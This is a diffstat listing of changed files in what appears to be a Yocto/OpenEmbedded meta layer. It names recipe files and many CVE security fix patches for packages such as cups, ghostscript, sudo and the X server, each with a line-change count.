-rw-r--r--meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb6
-rw-r--r--meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb8
-rw-r--r--meta/recipes-devtools/tcf-agent/tcf-agent_git.bb3
-rw-r--r--meta/recipes-devtools/tcltk/tcl_8.6.10.bb2
-rw-r--r--meta/recipes-devtools/unfs3/unfs3_git.bb5
-rw-r--r--meta/recipes-devtools/unifdef/unifdef_2.12.bb1
-rw-r--r--meta/recipes-devtools/vala/vala.inc2
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch9
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-aarch643
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-all4
-rwxr-xr-xmeta/recipes-devtools/valgrind/valgrind/run-ptest10
-rw-r--r--meta/recipes-devtools/valgrind/valgrind_3.15.0.bb5
-rw-r--r--meta/recipes-devtools/xmlto/xmlto_0.0.28.bb5
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch42
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb5
-rw-r--r--meta/recipes-extended/bash/bash.inc6
-rw-r--r--meta/recipes-extended/bash/bash/CVE-2019-18276.patch (renamed from meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch)0
-rw-r--r--meta/recipes-extended/bash/bash_5.0.bb2
-rw-r--r--meta/recipes-extended/bc/bc_1.07.1.bb3
-rw-r--r--meta/recipes-extended/bzip2/bzip2/Makefile.am2
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch58
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch312
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch581
-rw-r--r--meta/recipes-extended/cpio/cpio_2.13.bb6
-rw-r--r--meta/recipes-extended/cracklib/cracklib_2.9.5.bb3
-rw-r--r--meta/recipes-extended/cups/cups.inc21
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2022-26691.patch33
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32324.patch36
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32360.patch31
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-34241.patch65
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-4504.patch40
-rw-r--r--meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb3
-rw-r--r--meta/recipes-extended/ed/ed_1.15.bb1
-rw-r--r--meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch28
-rw-r--r--meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch24
-rw-r--r--meta/recipes-extended/gawk/gawk_5.0.1.bb15
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch31
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch109
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch121
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch37
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch238
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch65
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch54
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch145
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch60
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch51
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript_9.52.bb18
-rw-r--r--meta/recipes-extended/go-examples/go-helloworld_0.1.bb2
-rw-r--r--meta/recipes-extended/grep/grep_3.4.bb1
-rw-r--r--meta/recipes-extended/groff/files/0001-Include-config.h.patch1026
-rw-r--r--meta/recipes-extended/groff/groff_1.22.4.bb16
-rw-r--r--meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch45
-rw-r--r--meta/recipes-extended/gzip/gzip_1.10.bb1
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch79
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch37
-rw-r--r--meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch45
-rw-r--r--meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch94
-rw-r--r--meta/recipes-extended/iputils/iputils_s20190709.bb8
-rw-r--r--meta/recipes-extended/less/less/CVE-2022-48624.patch41
-rw-r--r--meta/recipes-extended/less/less_551.bb1
-rw-r--r--meta/recipes-extended/libaio/libaio_0.3.111.bb2
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch183
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch23
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch172
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch321
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch121
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch93
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch29
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch43
-rw-r--r--meta/recipes-extended/libarchive/libarchive_3.4.2.bb14
-rw-r--r--meta/recipes-extended/libnsl/libnsl2_git.bb2
-rw-r--r--meta/recipes-extended/libnss-nis/libnss-nis.bb6
-rw-r--r--meta/recipes-extended/libsolv/files/CVE-2021-3200.patch82
-rw-r--r--meta/recipes-extended/libsolv/libsolv_0.7.10.bb4
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch155
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb6
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch10
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch224
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch100
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch35
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb4
-rw-r--r--meta/recipes-extended/logrotate/logrotate_3.15.1.bb6
-rw-r--r--meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch27
-rw-r--r--meta/recipes-extended/lsb/lsb-release_1.4.bb1
-rw-r--r--meta/recipes-extended/lsof/lsof_4.91.bb2
-rw-r--r--meta/recipes-extended/ltp/ltp_20200120.bb2
-rw-r--r--meta/recipes-extended/lzip/lzip_1.21.bb1
-rw-r--r--meta/recipes-extended/man-db/man-db_2.9.0.bb7
-rw-r--r--meta/recipes-extended/mc/mc_4.8.23.bb1
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28736.patch77
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28938.patch80
-rw-r--r--meta/recipes-extended/mdadm/mdadm_4.1.bb3
-rw-r--r--meta/recipes-extended/mingetty/mingetty_1.08.bb1
-rw-r--r--meta/recipes-extended/minicom/minicom_2.7.1.bb2
-rw-r--r--meta/recipes-extended/newt/libnewt_0.52.21.bb2
-rw-r--r--meta/recipes-extended/pam/libpam/CVE-2024-22365.patch59
-rw-r--r--meta/recipes-extended/pam/libpam_1.3.1.bb1
-rw-r--r--meta/recipes-extended/parted/parted_3.3.bb3
-rw-r--r--meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb2
-rw-r--r--meta/recipes-extended/perl/libtimedate-perl_2.30.bb1
-rw-r--r--meta/recipes-extended/procps/procps/CVE-2023-4016.patch85
-rw-r--r--meta/recipes-extended/procps/procps_3.3.16.bb3
-rw-r--r--meta/recipes-extended/psmisc/psmisc_23.3.bb2
-rw-r--r--meta/recipes-extended/quota/quota_4.05.bb1
-rw-r--r--meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb2
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2021-26937.patch68
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2023-24626.patch40
-rw-r--r--meta/recipes-extended/screen/screen_4.8.0.bb2
-rw-r--r--meta/recipes-extended/sed/sed_4.8.bb1
-rw-r--r--meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch66
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-29383.patch54
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-4641.patch146
-rw-r--r--meta/recipes-extended/shadow/shadow-sysroot_4.6.bb2
-rw-r--r--meta/recipes-extended/shadow/shadow.inc6
-rw-r--r--meta/recipes-extended/shadow/shadow_4.8.1.bb5
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch26
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb7
-rw-r--r--meta/recipes-extended/sudo/files/CVE-2023-22809.patch113
-rw-r--r--meta/recipes-extended/sudo/sudo.inc6
-rw-r--r--meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch29
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch59
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch646
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch26
-rw-r--r--meta/recipes-extended/sudo/sudo_1.8.32.bb (renamed from meta/recipes-extended/sudo/sudo_1.8.31.bb)9
-rw-r--r--meta/recipes-extended/sysklogd/sysklogd.inc2
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch92
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch46
-rw-r--r--meta/recipes-extended/sysstat/sysstat_12.2.1.bb5
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2021-20193.patch133
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2022-48303.patch43
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2023-39804.patch64
-rw-r--r--meta/recipes-extended/tar/tar_1.32.bb9
-rw-r--r--meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb1
-rw-r--r--meta/recipes-extended/timezone/timezone.inc8
-rw-r--r--meta/recipes-extended/timezone/tzdata.bb10
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch67
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch39
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch33
-rw-r--r--meta/recipes-extended/unzip/unzip_6.0.bb7
-rw-r--r--meta/recipes-extended/watchdog/watchdog_5.15.bb5
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch58
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch165
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb2
-rw-r--r--meta/recipes-extended/xinetd/xinetd_2.3.15.bb3
-rw-r--r--meta/recipes-extended/xz/xz/CVE-2022-1271.patch96
-rw-r--r--meta/recipes-extended/xz/xz_5.2.4.bb5
-rw-r--r--meta/recipes-extended/zip/zip_3.0.bb7
-rw-r--r--meta/recipes-gnome/epiphany/epiphany_3.34.4.bb4
-rw-r--r--meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch46
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch55
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch40
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch61
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb3
-rw-r--r--meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb2
-rw-r--r--meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb2
-rw-r--r--meta/recipes-gnome/libnotify/libnotify_0.7.8.bb7
-rw-r--r--meta/recipes-gnome/librsvg/librsvg_2.40.21.bb3
-rw-r--r--meta/recipes-gnome/libsecret/libsecret_0.20.1.bb1
-rw-r--r--meta/recipes-graphics/builder/builder_0.1.bb2
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch21
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch46
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch60
-rw-r--r--meta/recipes-graphics/cairo/cairo_1.16.0.bb1
-rw-r--r--meta/recipes-graphics/clutter/clutter-gst-3.0.inc4
-rw-r--r--meta/recipes-graphics/clutter/clutter-gtk-1.0.inc5
-rw-r--r--meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch3
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch33
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch38
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch31
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch40
-rw-r--r--meta/recipes-graphics/freetype/freetype_2.10.1.bb4
-rw-r--r--meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch56
-rw-r--r--meta/recipes-graphics/glew/glew/notempdir.patch19
-rw-r--r--meta/recipes-graphics/glew/glew_2.2.0.bb2
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch335
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch135
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch179
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb5
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch457
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch400
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch133
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch97
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch75
-rw-r--r--meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb5
-rw-r--r--meta/recipes-graphics/kmscube/kmscube_git.bb6
-rw-r--r--meta/recipes-graphics/libfakekey/libfakekey_git.bb2
-rw-r--r--meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb2
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch79
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb5
-rw-r--r--meta/recipes-graphics/libva/libva-utils_2.6.0.bb2
-rw-r--r--meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb2
-rw-r--r--meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch15
-rw-r--r--meta/recipes-graphics/mesa/mesa.inc7
-rw-r--r--meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb1
-rw-r--r--meta/recipes-graphics/mx/mx-1.0_1.4.7.bb2
-rw-r--r--meta/recipes-graphics/mx/mx.inc6
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch27
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch31
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch44
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch28
-rw-r--r--meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit_git.bb14
-rw-r--r--meta/recipes-graphics/startup-notification/startup-notification_0.12.bb5
-rw-r--r--meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb1
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch100
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb3
-rw-r--r--meta/recipes-graphics/vulkan/assimp_5.0.1.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-demos_git.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb3
-rw-r--r--meta/recipes-graphics/waffle/waffle_1.6.0.bb18
-rw-r--r--meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch360
-rw-r--r--meta/recipes-graphics/wayland/libinput_1.15.2.bb1
-rw-r--r--meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch111
-rw-r--r--meta/recipes-graphics/wayland/wayland_1.18.0.bb1
-rw-r--r--meta/recipes-graphics/wayland/weston-init/weston.ini2
-rw-r--r--meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch32
-rw-r--r--meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch57
-rw-r--r--meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch99
-rw-r--r--meta/recipes-graphics/wayland/weston_8.0.0.bb5
-rw-r--r--meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb3
-rw-r--r--meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb6
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch333
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch58
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch38
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch111
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch63
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch42
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch46
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch52
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch64
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb9
-rw-r--r--meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb (renamed from meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb)7
-rw-r--r--meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb2
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch34
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb1
-rw-r--r--meta/recipes-graphics/xorg-lib/xorg-lib-common.inc3
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg.inc14
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch70
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch40
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch39
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch86
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch78
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch51
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch75
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch84
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch102
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch79
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch63
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch87
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch221
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch41
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch45
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch113
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch74
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch57
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch47
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb61
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb38
-rw-r--r--meta/recipes-kernel/blktrace/blktrace_git.bb7
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb3
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev.inc7
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch49
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch42
-rw-r--r--meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch32
-rw-r--r--meta/recipes-kernel/dtc/dtc.inc4
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch36
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch35
-rw-r--r--meta/recipes-kernel/dtc/dtc_1.6.0.bb2
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb17
-rw-r--r--meta/recipes-kernel/kern-tools/kern-tools-native_git.bb6
-rw-r--r--meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb3
-rw-r--r--meta/recipes-kernel/kmod/kmod.inc3
-rw-r--r--meta/recipes-kernel/kmod/kmod/ptest.patch25
-rw-r--r--meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb (renamed from meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb)227
-rw-r--r--meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc2
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion.inc13
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion_5.4.inc9445
-rwxr-xr-xmeta/recipes-kernel/linux/generate-cve-exclusions.py101
-rw-r--r--meta/recipes-kernel/linux/kernel-devsrc.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-dummy.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-dev.bb2
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-yocto.inc4
-rw-r--r--meta/recipes-kernel/linux/linux-yocto_5.4.bb23
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch46
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch45
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch51
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch147
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb (renamed from meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb)13
-rw-r--r--meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb3
-rw-r--r--meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb5
-rwxr-xr-xmeta/recipes-kernel/modutils-initscripts/files/modutils.sh2
-rw-r--r--meta/recipes-kernel/perf/perf.bb10
-rw-r--r--meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch70
-rw-r--r--meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch29
-rw-r--r--meta/recipes-kernel/powertop/powertop_2.10.bb10
-rw-r--r--meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb2
-rw-r--r--meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch49
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.bb7
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.inc2
-rw-r--r--meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb (renamed from meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb)4
-rw-r--r--meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb2
-rw-r--r--meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb5
-rw-r--r--meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb2
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch97
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch61
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch53
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch36
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch41
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch67
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch136
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb14
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2020-22219.patch197
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2021-0561.patch34
-rw-r--r--meta/recipes-multimedia/flac/flac_1.3.3.bb2
